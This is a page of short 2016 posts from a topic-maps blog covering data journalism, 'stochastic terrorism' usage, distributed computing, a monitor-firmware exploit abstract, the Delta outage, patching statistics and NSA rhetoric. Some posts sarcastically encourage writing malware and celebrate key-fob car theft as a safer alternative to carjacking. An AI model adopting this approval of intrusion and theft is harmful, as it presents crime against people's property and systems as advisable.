Another Word For It Patrick Durusau on Topic Maps and Semantic Diversity

August 10, 2016

50 ways to measure your analytics

Filed under: Journalism,News,Reporting — Patrick Durusau @ 8:24 am

50 ways to measure your analytics (with apologies to Paul Simon) by Melody Kramer.

From the post:

“The problem is all inside your figures,” she said to me.
“The answer is easy if you think more than numerically.
I’d like to help you in your struggle to count your impact perfectly.
There must be (at least) 50 ways to measure success for a news article.”

She said, “It’s really not my habit to really think about the news.
Furthermore, I hope my meaning won’t be lost or misconstrued.
But I’ll repeat myself, at the risk of being crude:
There must be 50 ways to assess whether your piece is reaching the full potential audience it could.

Fifty ways to count your numbers.'”

You will have to find mechanisms to measure your analytics but Melody does give you fifty (50) things to measure!

Clever use of the Paul Simon lyrics.

Suggest a “trigger warning” that doesn’t give away the trigger in this case? 😉

Stochastic Terrorism – Usage Prior To January 10, 2011?

Filed under: Language — Patrick Durusau @ 8:05 am

With Donald Trump’s remarks today, you know that discussions of stochastic terrorism are about to engulf social media.

Anticipating that, I tried to run down some facts on the usage of “stochastic terrorism.”

As a starting point, Google NGrams comes up with zero (0) examples up to the year 2000.

One blog I found, named appropriately, Stochastic Terrorism, has only one post from January 26, 2011, may have the same author as: Stochastic Terrorism: Triggering the shooters (Daily Kos, January 10, 2011) with a closely similar post: Glenn Beck- Consider yourself on notice *Pictures fixed* (Daily Kos, July 26, 2011). The January 10, 2011 post may be the origin of this phrase.

The Corpus of Contemporary American English, which is complete up to 2015, reports zero (0) hits for “stochastic terrorism.”

NOW Corpus (News on the Web) reports three (3) hits for “stochastic terrorism.”

July 18, 2016 – Salon. All hate is not created equal: The folly of perceiving murderers like Dylann Roof, Micah Johnson and Gavin Long as one and the same by Chauncey DeVega.

Dylann Roof was delusional; his understanding of reality colored by white racial paranoiac fantasies. However, Roof was not born that way. He was socialized into hatred by a right-wing news media that encourages stochastic terrorism among its audience by the repeated use of eliminationist rhetoric, subtle and overt racism against non-whites, conspiracy theories, and reactionary language such as “real America” and “take our country back.”

In case you don’t have the context for Dylann Roof:

Roof is a white supremacist. Driven by that belief, he decided to kill 9 unarmed black people after a prayer meeting in Charleston, North Carolina’s Ebenezer Baptist Church. Roof’s manifesto explains that he wanted to kill black people because white people were “oppressed” in their “own country,” “illegal immigrants” and “Jews” were ruining the United States, and African-Americas are all criminals. Like other white supremacists and white nationalists (and yes, many “respectable” white conservatives as well) Roof’s political and intellectual cosmology is oriented around a belief that white Americans are somehow marginalized or treated badly in the United States. This is perverse and delusional: white people are the most economically and politically powerful racial group in the United States; American society is oriented around the protection of white privilege.

“Stochastic terrorism” occurs twice in:

December 7, 2015 The American Conservative. The Challenge of Lone Wolf Terrorism by Philip Jenkins.

Jenkins covers at length “leaderless resistance:”


Amazingly, the story goes back to the U.S. ultra-Right in the 1980s. Far Rightists and neo-Nazis tried to organize guerrilla campaigns against the U.S. government, which caused some damage but soon collapsed ignominiously. The problem was the federal agencies had these movements thoroughly penetrated, so that every time someone planned an attack, it was immediately discovered by means of either electronic or human intelligence. The groups were thoroughly penetrated by informers.

The collapse of that endeavor led to some serious rethinking by the movement’s intellectual leaders. Extremist theorists now evolved a shrewd if desperate strategy of “leaderless resistance,” based on what they called the “Phantom Cell or individual action.” If even the tightest of cell systems could be penetrated by federal agents, why have a hierarchical structure at all? Why have a chain of command? Why not simply move to a non-structure, in which individual groups circulate propaganda, manuals and broad suggestions for activities, which can be taken up or adapted according to need by particular groups or even individuals?

The phrase stochastic terrorism occurs twice, both in a comment:

Are they leaderless resistance tactics or is this stochastic terrorism? Stochastic terrorism is the use of mass communications/media to incite random actors to carry out violent or terrorist acts that are statistically predictable but individually unpredictable. That is, remote-control murder by lone wolf. This is by no means the sole province of one group.

The thread ends shortly thereafter with no one picking up on the distinction between “leaderless resistance,” and “stochastic terrorism,” if there is one.

I don’t have a publication date for Stochastic Terrorism? by Larry Wohlgemuth, the lack of dating on content a rant for another day, which says:

Everybody was certain it would happen, and in the wake of the shooting in Tucson last week only the most militant teabagger was able to deny that incendiary rhetoric played a role. We knew this talk of crosshairs, Second Amendment remedies and lock and load eventually would have repercussions, and it did.

Only the most obtuse can deny that, if you talk long enough about picking up a gun and shooting people, marginal personalities and the mentally ill will respond to that suggestion. Feebleminded and disturbed people DO exist, and to believe these words wouldn’t affect them seemed inauthentic at best and criminal at worst.

Now that the unthinkable has happened, people on the left want to shove it down the throats of wingers that are denying culpability. Suddenly, like Manna from heaven, a radical new “meme” was gifted to people intended to buttress their arguments that incendiary rhetoric does indeed result in violent actions.

It begs the question, what is stochastic terrorism, and how does it apply to the shooting in Tucson.

This diary on Daily Kos by a member who calls himself G2geek was posted Monday, January 10, two days after the tragedy in Tucson. It describes in detail the mechanisms whereby “stochastic terrorism” works, and who’s vulnerable to it. Here’s the diarist’s own words in explaining stochastic terrorism:

Which puts the original of “stochastic terrorism” back the Daily Kos, January 10, 2011 post, Stochastic Terrorism: Triggering the shooters, which appeared two days after U.S. Representative Gabrielle Giffords and eighteen others were shot in Tuscon, Arizona.

As of this morning, a popular search engine returns 536 “hits” for “stochastic terrorist,” and 12,300 “hits” for “stochastic terrorism.”

The term “stochastic terrorism” isn’t a popular one, perhaps it isn’t as easy to say as “…lone wolf.”

My concern is the potential use of “stochastic terrorism” to criminalize free speech and to intimidate speakers into self-censorship.

Not to mention that we should write Privilege with a capital P when you can order the deaths of foreign leaders and prosecute anyone who suggests that violence is possible against you. Now that’s Privilege.

Suggestions on further sources?

August 9, 2016

ARGUS

Filed under: Distributed Computing,Functional Programming,Programming — Patrick Durusau @ 7:01 pm

ARGUS by Christopher Meiklejohn.

From the post:

This is one post in a series about programming models and languages for distributed computing that I’m writing as part of my history of distributed programming techniques.

Relevant Reading

  • Abstraction Mechanisms in CLU, Liskov, Barbara and Snyder, Alan and Atkinson, Russell and Schaffert, Craig, CACM 1977 (Liskov et al. 1977).
  • Guardians and Actions: Linguistic Support for Robust, Distributed Programs, Liskov, Barbara and Scheifler, Robert, TOPLAS 1982 (Liskov and Scheifler 1983).
  • Orphan Detection in the Argus System, Walker, Edward Franklin, DTIC 1984 (Walker 1984).
  • Implementation of Argus, Liskov, Barbara and Curtis, Dorothy and Johnson, Paul and Scheifer, Robert, SIGOPS 1987 (Liskov et al. 1987).
  • Distributed Programming in Argus, Liskov, Barbara CACM 1988 (Liskov 1988).

I’m thinking about how to fix an XFCE trackpad problem and while I think about that, wanted to touch up the references from Christopher’s post.

Apologies but I was unable to find a public version of: Implementation of Argus, Liskov, Barbara and Curtis, Dorothy and Johnson, Paul and Scheifer, Robert, SIGOPS 1987 (Liskov et al. 1987).

Hoping that easier access to most of the relevant reading will increase your enjoyment of Christopher’s post.

Enjoy!

Using Excel To Squash Duplicates

Filed under: Duplicates,Excel — Patrick Durusau @ 6:28 pm

How to use built-in Excel features to find duplicates by Susan Harkins.

From the post:

Duplicate values aren’t bad. In fact, most are necessary. However, duplicate records can skew reporting and analysis. Whether you’re finding duplicates in a single column or looking for duplicate records, Excel can do most of the work for you. In this article, I’ll show you easy ways to find duplicates by applying advanced filtering options and conditional formatting rules. First, we’ll define the term duplicate—it isn’t ambiguous, but context determines its meaning. Then, we’ll use Excel’s built-in features to find duplicates.

If the first paragraph hadn’t caught my attention, then:

Your definition of duplicate will depend on the business rule you’re applying.

certainly would have!

The same rule holds true for subject identity. It really depends on the business rule (read requirement) for your analysis.

In some cases subject may appear as topics/proxies but be ignored. Or their associations with other subjects will be ignored.

Or for some purposes, what were separate topics/proxies may form group subjects with demographic characteristics such as age, gender, voting status, etc.

If you are required to use Excel and bedeviled by duplicates, you will find this post quite useful.

ACHE Focused Crawler

Filed under: ElasticSearch,Record Linkage,Webcrawler — Patrick Durusau @ 4:51 pm

ACHE Focused Crawler

From the webpage:

ACHE is an implementation of a focused crawler. A focused crawler is a web crawler that collects Web pages that satisfy some specific property. ACHE differs from other crawlers in the sense that it includes page classifiers that allows it to distinguish between relevant and irrelevant pages in a given domain. The page classifier can be from a simple regular expression (that matches every page that contains a specific word, for example), to a sophisticated machine-learned classification model. ACHE also includes link classifiers, which allows it decide the best order in which the links should be downloaded in order to find the relevant content on the web as fast as possible, at the same time it doesn’t waste resources downloading irrelevant content.

ache-logo-400

The inclusion of machine learning (Weka) and robust indexing (ElasticSearch) means this will take more than a day or two to explore.

Certainly well suited to exploring all the web accessible resources on narrow enough topics.

I was thinking about doing a “9 Million Pages of Donald Trump,” (think Nine Billion Names of God) but a quick sanity check showed there are already more than 230 million such pages.

Perhaps by the election I could produce “9 Million Pages With Favorable Comments About Donald Trump.” Perhaps if I don’t dedupe the pages found by searching it would go that high.

Other topics for comprehensive web searching come to mind?

PS: The many names of record linkage come to mind. I think I have thirty (30) or so.

A Monitor Darkly:… [An IoT in your monitor?]

Filed under: Cybersecurity,IoT - Internet of Things,Security — Patrick Durusau @ 3:52 pm

A Monitor Darkly: Reversing and Exploiting Ubiquitous On-Screen-Display Controllers in Modern Monitors by Ang Cui, Jatin Kataria, Francois Charbonneau.

Abstract:

There are multiple x86 processors in your monitor! OSD, or on-screen-display controllers are ubiquitous components in nearly all modern monitors. OSDs are typically used to generate simple menus on the monitor, allowing the user to change settings like brightness, contrast and input source. However, OSDs are effectively independent general-purpose computers that can: read the content of the screen, change arbitrary pixel values, and execute arbitrary code supplied through numerous control channels. We demonstrate multiple methods of loading and executing arbitrary code in a modern monitor and discuss the security implication of this novel attack vector.

We also present a thorough analysis of an OSD system used in common Dell monitors and discuss attack scenarios ranging from active screen content manipulation and screen content snooping to active data exfiltration using Funtenna-like techniques. We demonstrate a multi-stage monitor implant capable of loading arbitrary code and data encoded in specially crafted images and documents through active monitor snooping. This code infiltration technique can be implemented through a single pixel, or through subtle variations of a large number of pixels. We discuss a step-by-step walk-through of our hardware and software reverse-analysis process of the Dell monitor. We present three demonstrations of monitoring exploitation to show active screen snooping, active screen content manipulation and covert data exfiltration using Funtenna.

Lastly, we discuss realistic attack delivery mechanisms, show a prototype implementation of our attack using the USB Armory and outline potential attack mitigation options. We will release sample code related to this attack prior to the presentation date.

This hack is surprising only in that discussions of the insecurity of the Internet of Things (IoT) have failed to mention the mini-Internet of Things sitting on our desktops.

The video of the presentation isn’t up on the BlackHat YouTube channel, yet. But check back.

Pro-tip: If you write about this hack, don’t say it uses “…unnoticeable sound waves…” to connect to a radio receiver. Radio waves != sound waves. Radio waves are electromagnetic radiation and sound waves are mechanical waves.

How to avoid 10 common mistakes in data reporting [Plus #11]

Filed under: Journalism,News,Reporting — Patrick Durusau @ 2:51 pm

How to avoid 10 common mistakes in data reporting by Catherine Sheffo.

From the post:

After getting your hands on a data set, the hardest part of incorporating data analysis into your beat is getting started — and avoiding beginners’ pitfalls along the way.

From scrambled columns to unintelligible field names, every file you receive with comes with challenges for new and experienced data reporters alike.

We talked to Sean Mussenden, chief of the data and graphics bureau at the University of Maryland’s Capital News Service, about 10 mistakes to avoid while you establish a workflow and get comfortable with data sets in your day-to-day reporting.

Topic map fans will recognize #5:

Mistake No. 5 – Assuming you know what the field names mean

That can easily extend to what is in the fields as well.

I would add:

Mistake No. 11 – Assuming data is truthful and unbiased

Always bear in mind data given to you has been “cooked.”

Data has been omitted, changed or added, however “raw” the data may appear to you. The act of collecting data involves omission, changes and additions. All from a point of view.

Not to mention whoever gave you data had an agenda as well.

There’s no escape from bias but you can work at serving your own agenda and not those of others.

Start Writing Malware Today!

Filed under: Cybersecurity — Patrick Durusau @ 2:29 pm

Chris Baraniuk’s report: ‘Project Sauron’ malware hidden for five years should light a fire under your ass to write malware today!

If you wait too long, all the good names for malware are going to be taken!

From the post:

The malware may have been designed by a state-sponsored group.

It can disguise itself as benign files and does not operate in predictable ways, making it harder to detect.

Experts from Kaspersky Lab and Symantec said it allows the attacker to spy on infected computers.

In September last year, Kaspersky first detected the malware on an unspecified “government organisation” network.

Since then, the firm claims to have found evidence of Project Sauron at more than 30 organisations in Russia, Iran and Rwanda.

These were generally government, scientific, military, telecoms and financial organisations, according to Kaspersky.

Separately, Symantec said it had found the malware in other countries, including at an airline in China and an embassy in Belgium.

You don’t want to get caught like the inventers of SCSI, who thought it should be pronounced “sexy,” but became known as “scuzzy.”

Nobody wants to be “there goes N, creator of the scuzzy malware.”

How embarrassing.

Almost as much as the experts missing Project Sauron for five years.

With ten year old vulnerabilities still in play and experts sleeping at the switch for five years, isn’t it time to presume all data is insecure?

That sets a common starting point for debating how much money should be spend making X data how secure?

Even data at the NSA is insecure, as Edward Snowden so ably demonstrated. The question is how much are you willing to spend for certain amount of security.

Or to put it differently, security is never cheap nor absolute.

August 8, 2016

U.S. Government Open Source Pilot – Hidden Costs? (Vulnerabilities?)

Filed under: Government,Open Source — Patrick Durusau @ 4:38 pm

Federal Source Code Policy: Achieving Efficiency, Transparency, and Innovation through Reusable and Open Source Software by Tony Scott and Anne E. Rung.

From the post:

The U.S. Government is committed to improving the way Federal agencies buy, build, and deliver information technology (IT) and software solutions to better support cost efficiency, mission effectiveness, and the consumer experience with Government programs. Each year, the Federal Government spends more than $6 billion on software through more than 42,000 transactions.1 A significant proportion of software used by the Government is comprised of either preexisting Federal solutions or commercial solutions. These solutions include proprietary, open source, and mixed source2 code and often do not require additional custom code development.

When Federal agencies are unable to identify an existing Federal or commercial software solution that satisfies their specific needs, they may choose to develop a custom software solution on their own or pay for its development. When agencies procure custom-developed source code, however, they do not necessarily make their new code (source code or code) broadly available for Federal Government-wide reuse. Even when agencies are in a position to make their source code available on a Government-wide basis, they do not make such code available to other agencies in a consistent manner. In some cases, agencies may even have difficulty establishing that the software was produced in the performance of a Federal Government contract. These challenges may result in duplicative acquisitions for substantially similar code and an inefficient use of taxpayer dollars. This policy seeks to address these challenges by ensuring that new custom-developed Federal source code be made broadly available for reuse across the Federal Government.3 This is consistent with the Digital Government Strategy’s “Shared Platform” approach, which enables Federal employees to work together—both within and across agencies—to reduce costs, streamline development, apply uniform standards, and ensure consistency in creating and delivering information.4 Enhanced reuse of custom-developed code across the Federal Government can have significant benefits for American taxpayers, including decreasing duplicative costs for the same code and reducing Federal vendor lock-in.5

This policy also establishes a pilot program that requires agencies, when commissioning new custom software, to release at least 20 percent of new custom-developed code as Open Source Software (OSS) for three years, and collect additional data concerning new custom software to inform metrics to gauge the performance of this pilot.6 (footnotes omitted)

This open source pilot is a good example of government leadership. After open source has become the virtual default of private industry, the government decided to conduct a three-year pilot project to assess the concept.

Not a bad idea but someone needs to ramp up to track every open source release from the federal government.

Such releases need to be evaluated for the costs of new security bugs introduced into the software ecosystem and poor programming practices on software development.

Otherwise, a rosy picture of reduced duplicative costs for the same code may conceal higher software costs due to widespread security vulnerabilities.

Trust is ok, verification is better.

Imaginative Hacking – Delta Flights Delayed Worldwide

Filed under: Cybersecurity,Security — Patrick Durusau @ 10:56 am

Delta Flights Grounded For Hours Due To Worldwide System Outage by Camila Domonoske.

From the post:

Delta flights around the world were delayed this morning due to a “computer outage,” the company says.

A power outage in Atlanta around 2:30 a.m. ET was responsible for the problem, the company said in a statement.

“We are aware that flight status systems, including airport screens, are incorrectly showing flights on time,” Delta says. Meanwhile, passengers attempting to check in online or through Delta’s app have reported seeing error messages.

The problem is “system-wide” and happening “everywhere,” the company has said.
….

No causes have been specified for the “power outage.”

But a good example of how imaginative hacking can bring down a worldwide transportation system, without ever breaching computer security.

Delta computer security is probably as good as airline security gets, but who needs root access when you can pull the power plug?

A real world denial of service (DoS) attack.

PS: How many degrees of separation does your computer security encompass?

August 7, 2016

Hierarchy of Disagreement – Trump On Nuclear Weapons

Filed under: Argumentation,Journalism,News,Reporting — Patrick Durusau @ 3:50 pm

disagreement-levels-460

Politicians? Politicians?

Hell, I would be happy if news commentators and “experts” that appear on news shows would rise above contradiction.

Repetition, especially repeating what other commentators have said, isn’t evidence, it’s just noise.

If the medium you are using doesn’t support robust referencing of facts and analysis, you are using the wrong medium.

Or should that be … “you are following the wrong medium?”

You remember the Dilbert cartoon about the evening news, Sunday February 07, 1993 with the line:

A new poll shows that many voters have strong opinions on these issues despite the fact that we provide no useful contextual data.

That is a great summary of news reporting on top issues of the day. On occasion NPR will have an in-depth analysis but it repeats the stories of the day with little context, just like other media outlets.

Granting that is a limitation of the medium, why not use the Internet to deliver the context that video or radio media lack the time to deliver? Using video or radio as a highlights or awareness service, with further details collected and organized for viewer/listeners.

Despite timely, accurate and moving news reporting, I don’t have a regular source that provides in-depth contextual for everyday news stories.

For example, the internet was aflame with news of Trump asking “…why he could not use nuclear weapons?” Or at least that was the headline.

Some reports did pick up the contradiction in spending $billions on weapons you aren’t (don’t intend?) using, but few and far in between. And of those that did, how many examined the economic drivers that have created a useless product industry? The one that produces nuclear weapons.

In case you are curious, the United States has steadfastly refused to renounce first strike as a military strategy. (Report on Nuclear Employment Strategy of the United States, 2010, yes, during President Obama’s first term in office).

Do you recall seeing in depth reporting or analysis of either of those two aspects of the use of nuclear arms issue?

There was a lot of huffing, puffing and strutting around as I recall but little in the way of substantive or contextual analysis.

Don’t Car Jack! Hack!

Filed under: Cybersecurity — Patrick Durusau @ 10:33 am

Two thieves in Houston, Texas have demonstrated a safe alternative to car jacking, car hacking!

We have all seen news videos of car jacking incidents:

It is no longer necessary for thieves to endanger others or to face the harsh penalties for car jacking.

Here’s the gist of the story:


The two men have also been filmed during a theft of a Jeep Wrangler, the surveillance video shows the suspects got under the hood, cut wires of an alarm and then jumped inside the SUV. Once inside, he used the database and the vehicle identification number to program a new key fob for the Jeep.

Once inside the vehicle, the criminals used the laptop running the software that accessed the database of the vehicle identification number to program a new key fob.
Huston police identified and arrested 2 men while it was investigating a series of car thefts made using a pirated software running on the thieves’ laptop

Advantages to car hacking:

  • Thieves focus on newer model cars
  • No endangerment of drivers
  • Lesser penalties:

    The federal armed carjacking law, which took effect in 1992, carries penalties of up to 15 years in prison for each count; 25 years if someone is seriously injured; and life in prison or the death penalty if someone is killed. If a gun is used in the carjacking, extra years are added to the sentence. Carjackers will drive themselves to severe penalties in Detroit

  • No high speed police chases endangering innocent others

Finally, an advance in technology that benefits drivers, thieves, police and the public. Who would have thought?

August 6, 2016

Attribution of Hacks – Hard, Repeating Claimed Attributions – Easy

Filed under: Cybersecurity — Patrick Durusau @ 8:06 pm

attribution-460

A cautionary slide from #defcon on attribution of hacks.

Lessons that seem lost on media outlets that repeat attributions in headlines but leave equivocation on attributions buried in text.

You have to go as far as I would: “Known Liars and Putin Haters Attribute Hack to Russia.”

But a “liar as source” alert at the beginning of an article, would give readers a shot at forming a considered option of a parroted tale from agency sources.

Congressional Research Service Fiscal 2015 – Full Report List

Filed under: CRS,Government,Government Data,Open Access — Patrick Durusau @ 4:25 pm

Congressional Research Service Fiscal 2015

The Director’s Message:

From international conflicts and humanitarian crises, to immigration, transportation, and secondary education, the Congressional Research Service (CRS) helped every congressional office and committee navigate the wide range of complex and controversial issues that confronted Congress in FY2015.

We kicked off the year strongly, preparing for the newly elected Members of the 114th Congress with the tenth biannual CRS Seminar for New Members, and wrapped up 2015 supporting the transition to a new Speaker and the crafting of the omnibus appropriations bill. In between, CRS experts answered over 62,000 individual requests; hosted over 7,400 Congressional participants at seminars, briefings and trainings; provided over 3,600 new or refreshed products; and summarized over 8,000 pieces of legislation.

While the CRS mission remains the same, Congress and the environment in which it works are continually evolving. To ensure that the Service is well positioned to anticipate and meet the information and research needs of a 21st-century Congress, we launched a comprehensive strategic planning effort that has identified the most critical priorities, goals, and objectives that will enable us to most efficiently and effectively serve Congress as CRS moves into its second century.

Responding to the increasingly rapid pace of congressional business, and taking advantage of new technologies, we continued to explore new and innovative ways to deliver authoritative information and timely analysis to Congress. For example, we introduced shorter report formats and added infographics to our website CRS.gov to better serve congressional needs.

It is an honor and privilege to work for the U.S. Congress. With great dedication, our staff creatively supports Members, staff and committees as they help shape and direct the legislative process and our nation’s future. Our accomplishments in fiscal 2015 reflect that dedication.

All true but also true that the funders of all those wonderful efforts, taxpayers, have spotty and/or erratic access to those research goodies.

Perhaps that will change in the not too distant future.

But until then, perhaps a list of all the new CRS products in 2015, which runs from page 47 to page 124 may be of interest.

Not all entries are unique as they may appear under different categories.

Sadly the only navigation you are offered is by chunky categories like “Health” and “Law and Justice.”

Hmmm, perhaps that can be fixed, at least to some degree.

Watch for more CRS news this coming week.

Cyber Security Reports – 2016

Filed under: Cybersecurity,Security — Patrick Durusau @ 2:12 pm

While casting about for statistics on hacking I ran across two cyber security reports that need to be on your reading list:

Verizon’s 2016 Data Breach Investigations Report, in part because it shares its database of incident reports, a novelty in the area of cyber security.

2016 NTT Group, Global Threat Intelligence Report, which does not share the underlying data.

Both will repay a close reading several times over.

Enjoy!

PS: I extracted the statistics I needed for a post but I’m going to give both reports a slow read. My only regret is that the contents are trapped in dead PDF files, making it difficult to reuse or repurpose with other data.

I am reminded that Mark Logic has a xdmp:pdf-convert function.

No ‘Raiders of the Lost Ark’ Stockpile? You Are Still In Danger!

Filed under: Cybersecurity,NSA,Security — Patrick Durusau @ 1:45 pm

NSA denies ‘Raiders of the Lost Ark’ stockpile of security vulnerabilities by Alex Hern.

From the post:

America’s National Security Agency (NSA) spends upwards of $25m in a year buying previously undisclosed security vulnerabilities – known as zero days, because that’s the length of time the target has had to fix them – but the large investment may not result in as much of a collection of hacking capabilities as is widely assumed.

Jason Healey, a senior research scholar at Columbia University and director at the Atlantic Council policy thinktank, argues that the true number of zero days stockpiled by the NSA is likely in the “dozens”, and that the agency only adds to that amount by a very small amount each year. “Right now it looks like single digits,” he says, adding that he has “high confidence in this assessment.”

One key piece of evidence comes from the NSA itself, which in 2015 claimed that 91% of vulnerabilities it procured were eventually disclosed to the vendors whose products were at risk. Of the other 9%, at least some of those weren’t disclosed because they were fixed before they could be, the agency adds.

Similarly, the White House has revealed that in one year since the current disclosure policy was implemented, it reviewed about 100 software vulnerabilities discovered by the NSA to determine if they should be disclose, and “kept only about two”. Healey adds that in the autumn of 2014, he was personally told that every single vulnerability which had come up for review had been disclosed.

No amount of factual reporting is likely to dispel the myth of an NSA horde of zero days.

However, the Verizon 2016 Data Breach Investigations Report makes it clear that zero days aren’t the main source of hacking danger:

verizon-2016-460

That’s not an error! Vulnerabilities prior to 1999 are still in use.

You can spend your days discussing rumors of the latest zero day or you can insist that IT follow a verified application of patches process.

How effective is patching known vulnerabilities?

The top 10 internal vulnerabilities accounted for over 78 percent of all internal vulnerabilities during 2015. All 10 internal vulnerabilities are directly related to outdated patch levels on the target systems. (2016 NTT Group, Global Threat Intelligence Report, page 5. Emphasis in original.)

Routine patching can reduce your internal vulnerabilities by 78% (on average).

That’s a clear, actionable, measurable requirement.

Call up your IT department, ask for a list of all the software in your enterprise and a list of patches that have been applied to each instance and those waiting to be applied (as per the vendor).

Remember, a data breach maybe ITs “fault,” but it may be your job that is at risk.

PS: One of earliest uses of topic maps was to track software on a university network.

August 5, 2016

The Comprehensive LaTeX Symbol List

Filed under: TeX/LaTeX — Patrick Durusau @ 9:03 pm

The Comprehensive LaTeX Symbol List by Scott Pakin.

Abstract:

This document lists 14032 symbols and the corresponding LATEX commands that produce them. Some of these symbols are guaranteed to be available in every LATEX 2 system; others require fonts and packages that may not accompany a given distribution and that therefore need to be installed. All of the fonts and packages used to prepare this document—as well as this document itself—are freely available from the Comprehensive TEX Archive Network (http://www.ctan.org/).

For unfortunates who print to A4 paper: http://tug.ctan.org/info/symbols/comprehensive/symbols-a4.pdf.

Perhaps not as challenging as giving Unicode character names for random representative glyphs but at 14032 symbols, certainly enough material to keep you busy for several long afternoons!

Enjoy!

Category theory definition dependencies

Filed under: Category Theory,Mathematical Reasoning,Mathematics — Patrick Durusau @ 8:39 pm

Category theory definition dependencies by John D. Cook.

From the post:

The diagram below shows how category theory definitions build on each other. Based on definitions in The Joy of Cats.

category_concepts-460

You will need John’s full size image for this to really be useful.

Prints to 8 1/2 x 11 paper.

There’s a test of your understanding of category theory.

Use John’s dependency graph and on (several) separate pages, jot down your understanding of each term.

Node XL (641 Pins)

Filed under: Graphs,NodeXL,Visualization — Patrick Durusau @ 8:17 pm

Node XL

Just a quick sample:

node-xl-pins-460

That’s only a sample, another 629 await your viewing (perhaps more by the time you read this post).

I have a Pineterest account but this is the first set of pins I have chosen to follow.

Suggestions of similar visualization boards at Pinterest?

Enjoy!

Google Deletes Palestine Or Does It?

Filed under: Mapping,Maps,Politics — Patrick Durusau @ 7:52 pm

Have you heard that Google removed Palestine from Google Maps on 25 July 2016?

At first blush (warning, spoiler to this story coming):

Searching for Israel:

israel-google-map-460

Searching for Palestine:

palestine-google-460

Do you see a label for Palestine? Despite the side border in Google Maps reporting:

The State of Palestine, also known simply as Palestine, is a de jure sovereign state in the Middle East that is recognized by 136 UN members and since 2012 has a status of a non-member observer state…

Searching further I found more discussions about Google removing Palestine from Google Maps, but with conflicting dates.

That sent me to the Internet Archive WayBack Machine where I found Google Maps for Israel as follows:

2010:

google-maps-11-15-2010-israel-460

2012:

google-maps-11-15-2012-israel-460

2014:

google-maps-10-01-2014-israel-460

Some observations:

West Bank appears in 2010 but not thereafter.

Gaza is labeled if you search for Palestine but unlabeled if you search for Israel (first two images).

Curious, is there another state, recognized by 136 UN members that does not appear by name in Google Maps?

The coverage of Google Maps gets spotty the further back you go in the Internet Archive. Unfortunate because it is likely the only trusted witness to ever changing digital content.

On the whole, reports of Google deleting Palestine from Google Maps are false. Google never identified Palestine at all.

That’s not a defense to Google’s failure to identify Palestine but an attempt to illustrate Google’s historical failure to identify Palestine.

$hell on Earth: From Browser to System Compromise

Filed under: Cybersecurity,Security — Patrick Durusau @ 3:55 pm

$hell on Earth: From Browser to System Compromise by Matt Molinyawe, Abdul-Aziz Hariri, and Jasiel Spelman.

From the paper:

The winning submissions to Pwn2Own 2016 provided unprecedented insight into the state-of-the-art techniques in software exploitation. Every successful submission provided remote code execution as the super user (SYSTEM/root) via the browser or a default browser plug-in. In most cases, these privileges were attained through the exploitation of the Microsoft WindowsÂŽ or Apple OS XÂŽ kernel. Kernel exploitation, using the browser as an initial vector, was a rare sight in previous contests.

This white paper will detail the eight winning browser-to-super-user exploitation chains demonstrated at this year’s contest. Topics such as modern browser exploitation, the complexity of kernel use-after-free vulnerability exploitation, the simplicity of exploiting logic errors, and directory traversals in the kernel are also covered. This paper analyzes all attack vectors, root causes, exploitation techniques, and remediation for vulnerabilities.

Reducing attack surfaces with application sandboxing is a step in the right direction. However, the attack surface remains expansive and sandboxes only serve as minor obstacles on the way to complete compromise. Kernel exploitation is clearly a problem, which has not disappeared and is possibly on the rise. If you’re like us, you can’t get enough of it—it’s shell on earth.

Unless you are still reading Harry Potter and the cursed child, the $hell on Earth whitepaper will be your best read for the weekend.

Enjoy!

Your Next Favorite Twitter Account: @DeepDrumpf

Filed under: Neural Networks,Politics,Twitter — Patrick Durusau @ 2:25 pm

@DeepDrumpf is a Neural Network trained on Donald Trump transcripts.

If you are curious beyond the tweets, see: Postdoc’s Trump Twitterbot Uses AI To Train Itself On Transcripts From Trump Speeches.

Ideally an interface would strip @DeepDrumpf and @realDonaldTrump off of tweets and present you with the option to assign authorship to @DeepDrumpf or @realDonaldTrump.

At the end of twenty or thirty tweets, you get your accuracy score over assignment of authorship.

Enjoy!
ďżź

August 4, 2016

Anonymous Video – USA -> NSA

Filed under: Government,NSA — Patrick Durusau @ 2:34 pm

While amusing, the topic of this video is deadly serious.

The NSA, firmly, albeit misguidedly, believes:

The United States today faces very real, very grave national security threats. Extremism and international terrorism flourish in too many areas of the world, threatening our warfighters, our allies and our homeland. Regional conflicts can have serious effects on U.S. national interests. Hostile foreign governments and terrorists trade in, or seek to acquire, weapons of mass destruction and/or the materials to produce them. Tons of illegal drugs are smuggled into our country each year.

The newest threats we face, and perhaps the fastest growing, are those in cyberspace. Cyber threats to U.S. national and economic security increase each year in frequency, scope and severity of impact. Cyber criminals, hackers and foreign adversaries are becoming more sophisticated and capable every day in their ability to use the Internet for nefarious purposes.

As a nation, we are dependent on the Internet – we use it for everything. We communicate online, bank and shop online, and store much of our personal information there. In business, education and government, we all count on having ready access to the Internet and its many capabilities as we go about our daily routines. The Internet opens up new worlds to users.

But while cyberspace offers great opportunities, it also comes with vulnerabilities. Our information networks and technology are constantly at risk from a variety of bad actors using a multitude of techniques – remote hacking intrusions, the placement of malware, spearphishing and other means of gaining access to networks and information.

Some of these bad actors are criminals motivated by profit, particularly in the areas of identity theft and other forms of financial cybercrime. The cost of cybercrime – already in the billions of dollars – rises each year.

But cyber threats also come from nation states and other actors who seek to exploit information to gain an advantage over the United States. They might seek an economic advantage, or to gain insight into our military or foreign policy. Denial of service attacks disrupt business and undermine confidence.

Terrorists and extremist groups today use the power of the Internet, especially social media, to spread their messages of hate and intolerance, and to recruit new members, often targeting vulnerable young people. The global reach of cyberspace and the complexity of its networks provide bad actors ample places to hide, safe from the reach of international law.

To meet these threats, our national leaders, military leaders, policy makers and law enforcement personnel must understand who our adversaries are, where they are, and what their capabilities, plans and intentions are. At the same time, we must ensure that we protect our own national security information from those who would do us harm. These are the capabilities that the National Security Agency provides to our nation, to our leaders and to our fellow Americans – 24 hours a day, seven days a week. [Understanding The Threat]

Surrounded by jinns and demons, known and unknown, as the only hope for Truth, Justice and the American Way, what choice does the NSA have but to use any and all means, fair and foul, to meet those threats?

As you know, I’m not a big fan of the NSA or its surveillance programs, but in researching this post, I encountered a shift in the rhetoric of the NSA.

As you can see in Understanding The Threat, the entire focus is on hazards and dangers that would justify any degree of action of lawlessness.

Contrast that with the Commitment that is preserved by the Internet Archive (December, 2015):

These are our commitments to you, our fellow citizens:

  • We will act with integrity to advance the rights, goals, and values of the Nation.
  • We will adhere to the spirit and the letter of the Constitution and the laws and regulations of the United States.
  • We will support and protect our troops in the field.
